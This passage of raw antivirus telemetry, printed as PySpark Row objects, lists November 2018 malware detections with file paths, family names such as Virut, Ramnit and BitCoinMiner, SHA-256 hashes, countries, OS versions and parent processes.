  Row(detection=Row(filename='avscan-20181104-215646-bce4b3d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215646-BCE4B3D9', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:56:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220808-37be77e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-220808-37BE77E9', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:08:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d3c0', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d3c0', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8fb5', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8fb5', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:33:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090432-6541b887', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca757762\\AVSCAN-20181104-084814-A417CACE\\AVSCAN-20181104-090432-6541B887', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T02:04:35Z'), dt=datetime.date(2018, 11, 4)),
  ...],
 [Row(detection=Row(filename='littleha.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\LITTLEHA\\LITTLEHA.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mall.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\MALL\\MALL.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='oceandrv.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\OCEANDRV\\OCEANDRV.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='oceandn.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\OCEANDN\\OCEANDN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hotel.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\HOTEL\\HOTEL.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nbeachbt.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\NBEACHBT\\NBEACHBT.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mansion.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\MANSION\\MANSION.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nbeach.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\NBEACH\\NBEACH.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='بولنج.exe', filepath='I:\\ألعاب\\Games 1\\بولنج\\بولنج.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='golf.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\GOLF\\GOLF.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='haiti.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\HAITI\\HAITI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cam.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\CAM.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gsdx32-sse4.dll', filepath='H:\\模擬器\\pcsx2-v1.5.0-dev-2014-gb2a2a3a-windows-x86\\plugins\\GSdx32-SSE4.dll', filesize=2432000, name='W32/Ramnit.CD.#M1.#R1'), hash='71b4c7e7e80e54d814e542d3075a9d0b62831b950076c5b2189f63f0e4585f9a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-02T16:59:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='71dff8a9a8dba592d6d93914da2ef77f6405da2d5095d6323064345527b900a3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:35:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='71e4d9ace1c4d19f9a8f0031c846f836378f2ea069b5133a0ce41a45f4917180', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-5\\71E4D9ACE1C4D19F9A8F0031C846F836378F2EA069B5133A0CE41A45F4917180', filesize=52000, name='HTML/ExpKit.Gen2.#M1.#R1'), hash='71e4d9ace1c4d19f9a8f0031c846f836378f2ea069b5133a0ce41a45f4917180', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:41:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='71e4d9ace1c4d19f9a8f0031c846f836378f2ea069b5133a0ce41a45f4917180', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-5\\71E4D9ACE1C4D19F9A8F0031C846F836378F2EA069B5133A0CE41A45F4917180', filesize=52000, name='HTML/ExpKit.Gen2.#M1.#R1'), hash='71e4d9ace1c4d19f9a8f0031c846f836378f2ea069b5133a0ce41a45f4917180', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:19:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061648-103b7ad8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-061648-103B7AD8', filesize=52000, name='HTML/ExpKit.Gen2.#M1.#R1'), hash='71e4d9ace1c4d19f9a8f0031c846f836378f2ea069b5133a0ce41a45f4917180', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:18:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fp748stff.exe', filepath='C:\\ProgramData\\TopodeaeL\\FP748sTFf.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline='--engine=2 --session-id=cDbijIOXtd8WenbNwIeAyH49x9DNDxZ4JSy5p4j7 --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\32.167.200\\software_reporter_tool.exe', parentsize=13830776, timestamp='2018-11-02T07:51:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103320-40ac01b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52e373a3\\AVSCAN-20181102-092201-B325F22F\\AVSCAN-20181102-103320-40AC01B8', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:28:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='z2w1.exe', filepath='C:\\ProgramData\\EXstRaCeooupon\\Z2W1.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\PC Faster\\5.1.0.0\\Cloud Security\\BCloudScan.exe', parentsize=2265456, timestamp='2018-11-02T03:51:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='v_mzo8.exe', filepath='\\\\?\\C:\\ProgramData\\DiscountExtensi\\V_MZo8.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:45:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145238-40e895ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b42d94e4\\AVSCAN-20181102-145135-3ABB3175\\AVSCAN-20181102-145238-40E895EE', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-040330-8c167567', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_275196ea\\AVSCAN-20181102-035145-215BA771\\AVSCAN-20181102-040330-8C167567', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:50:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-095349-645e15d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52e373a3\\AVSCAN-20181102-092201-B325F22F\\AVSCAN-20181102-095349-645E15D6', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:49:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102301-0735bc1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52e373a3\\AVSCAN-20181102-092201-B325F22F\\AVSCAN-20181102-102301-0735BC1C', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:18:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-035446-3cc888d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_275196ea\\AVSCAN-20181102-035145-215BA771\\AVSCAN-20181102-035446-3CC888D5', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:41:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fhhuwtau.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\fHhUWtau.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ohmmipdl.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\oHMmiPdL.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:06:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='riblqhsl.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\RiBLQhSl.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:06:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lxlfkncw.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\LXlFKncW.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:06:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xzhocuti.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\xZhoCuti.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:06:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fviwxvsg.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\fvIWxVsG.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:06:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xkywpdel.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\XKYWPDEl.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:06:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ulseejyl.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\uLsEejYL.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:34:22Z'), dt=datetime.date(2018, 11, 2)),
